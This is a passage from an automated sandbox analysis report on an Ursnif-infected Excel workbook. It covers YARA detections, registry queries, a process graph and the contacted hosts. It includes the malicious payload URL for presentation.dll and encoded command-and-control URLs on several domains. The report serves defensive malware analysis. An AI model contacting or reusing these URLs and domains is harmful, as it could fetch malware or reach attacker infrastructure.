Source: C:\Windows\SysWOW64\regsvr32.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 1_2_66DEF574
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW, 1_2_66DED27D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num, 1_2_66DEFBE2
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA, 1_2_66DF0133
Queries the installation date of Windows
Source: C:\Windows\SysWOW64\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_66DB1979 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 1_2_66DB1979
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_66DB146C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 1_2_66DB146C
Source: C:\Windows\SysWOW64\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.714853915.00000000041D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 1.2.regsvr32.exe.66db0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.regsvr32.exe.41d8d29.0.raw.unpack, type: UNPACKEDPE
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.838086006.0000000005098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.838133598.0000000005098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.838242491.0000000005098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.838283441.0000000005098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.838186200.0000000005098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.838303300.0000000005098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.838219615.0000000005098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.838266816.0000000005098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 7148, type: MEMORY

Remote Access Functionality:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.714853915.00000000041D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 1.2.regsvr32.exe.66db0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.regsvr32.exe.41d8d29.0.raw.unpack, type: UNPACKEDPE
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.838086006.0000000005098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.838133598.0000000005098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.838242491.0000000005098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.838283441.0000000005098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.838186200.0000000005098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.838303300.0000000005098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.838219615.0000000005098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.838266816.0000000005098000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 7148, type: MEMORY
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 403127 Sample: 6613n246zm543w.xlsb Startdate: 03/05/2021 Architecture: WINDOWS Score: 100 45 Found malware configuration 2->45 47 Multi AV Scanner detection for dropped file 2->47 49 Document exploit detected (drops PE files) 2->49 51 8 other signatures 2->51 6 EXCEL.EXE 37 48 2->6         started        11 iexplore.exe 1 72 2->11         started        13 iexplore.exe 1 50 2->13         started        15 iexplore.exe 1 50 2->15         started        process3 dnsIp4 39 docs.atu.ngr.mybluehost.me 162.241.24.47, 49740, 80 UNIFIEDLAYER-AS-1US United States 6->39 27 C:\Users\user\AppData\...\presentation[1].dll, PE32 6->27 dropped 29 C:\Users\Public\block.dll, PE32 6->29 dropped 31 C:\Users\user\Desktop\~$6613n246zm543w.xlsb, data 6->31 dropped 53 Document exploit detected (creates forbidden files) 6->53 55 Document exploit detected (UrlDownloadToFile) 6->55 17 regsvr32.exe 6->17         started        20 iexplore.exe 37 11->20         started        23 iexplore.exe 35 13->23         started        25 iexplore.exe 35 15->25         started        file5 signatures6 process7 dnsIp8 41 Writes or reads registry keys via WMI 17->41 43 Writes registry values via WMI 17->43 33 app.buboleinov.com 34.86.224.8, 49764, 49765, 49779 GOOGLEUS United States 20->33 35 chat.billionady.com 23->35 37 app3.maintorna.com 25->37 signatures9
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
162.241.24.47
docs.atu.ngr.mybluehost.me United States
46606 UNIFIEDLAYER-AS-1US false
34.86.224.8
app3.maintorna.com United States
15169 GOOGLEUS false

Contacted Domains

Name IP Active
app3.maintorna.com 34.86.224.8 true
chat.billionady.com 34.86.224.8 true
app.buboleinov.com 34.86.224.8 true
docs.atu.ngr.mybluehost.me 162.241.24.47 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://docs.atu.ngr.mybluehost.me/presentation.dll false
    high
    http://app.buboleinov.com/z641zbWI8F5NGo_/2BArU_2BbQAq9y6CQ2/iYglxzTUG/6THXjDZRni2_2BHtJ8xS/hQVd4Naf0x6FbAwTSzE/j2W2tGJ3BJZvVbX11_2BUV/fpUC_2B6Q9mfu/3o2_2B46/OLYUaNQoAWvs_2FbvG_2BKH/7iWhqlNtvD/J2yWSfQ76dcAKMFuZ/3mJsX_2Bs0FH/qiS1vq47Ihl/qYjn0Yg7_2Fs22/uUYx5ZbSNGvuUqs3cskdX/qwpRyPlhL_2FkPNb/1rre5N02_2FaPz2/bBs8grMdfh07gYK5nT/9gtPy0LuP/wYiN2jeiY_2BAyR8pqAH/pP4fdKjSstJgODzp7LO/GGc_2F8syE1Y/XZR_2F6_2/Fm false
    • Avira URL Cloud: safe
    unknown
    http://app3.maintorna.com/F8d0aGGV7/IFlLstzk2tyypfn_2Fmm/U_2BnTF3_2BdKngQdqp/axZO_2FFau1L_2Bp8DkKab/4wB0QgN10EkpX/AcOnUpOy/sx6xA_2BQgCwb8YrqbLddxV/OJDcwH612j/SgvuMvjnhyj_2BJZu/QEAjCzH7iakZ/oq21_2FJOeJ/SwjqqZOEiD8hxw/G5RB86oNRHPQeS1WmQofx/9xSmKamg1DMw2k9J/4izLK3dr4GQOE25/kgxEQPFLWO2XCIrGa5/PGMRBxlzM/0Ejxm5VgBpRdVV0sXhjU/M_2BEEG31ubNw2v0Fmu/Lkyp4hip_2Fjy_2FVx4B63/WkF_2BbbsvI0l/DMReAFgM/oHuJg false
    • Avira URL Cloud: safe
    unknown
    http://chat.billionady.com/pGAWsdPZsgmlp8IeD/HimMWYQD3vgj/nWrp3CJhfHJ/OCZulU9DF2vABL/EGqK7P_2BoREnVKXUKrMq/O25bJi9K6cy2wBFt/EYfe_2FKkVGOswo/zrljXUlqaCddZUQdMz/46rOG0TD7/jSwGOmqtlI1lhZnMTkpj/OVdYkB6bCvlTi8j76Hq/ls7qgwy0MLToWsmBH4qSen/tk209OxMyhspY/JW_2B_2B/JDgZlFf6GkmqLMRn5B4cp37/KRW8p6Kt3j/I1_2FzkkwDlUgXN_2/B8sJnr99OISw/18ko4KjrRQ1/26TtcKYNzHhDSL/9AqfJNAejPb1kyuCVpyID/xExOyq0w/s false
    • Avira URL Cloud: safe
    unknown